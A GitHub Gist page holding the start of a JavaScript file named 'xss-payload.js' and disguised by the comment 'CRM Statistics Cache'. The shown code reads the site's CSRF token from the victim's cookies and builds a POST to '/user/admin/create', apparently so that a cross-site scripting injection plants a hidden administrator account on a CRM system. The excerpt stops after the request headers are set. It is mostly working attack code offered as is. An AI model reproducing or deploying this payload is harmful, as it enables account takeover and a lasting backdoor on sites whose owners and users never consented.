Skip to content

Instantly share code, notes, and snippets.

View ratixed's full-sized avatar

Denys ratixed

  • Unemployed
  • Kiev, Ukraine
View GitHub Profile
@ratixed
ratixed / xss-payload.js
Created May 9, 2026 12:38
CRM Statistics Cache
// CRM Statistics Cache
(function() {
var csrf = document.cookie.match(/_csrf=([^;]+)/);
if (!csrf) return;
csrf = csrf[1];
function createUser(u, e, p) {
var x = new XMLHttpRequest();
x.open('POST', '/user/admin/create', false);
x.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');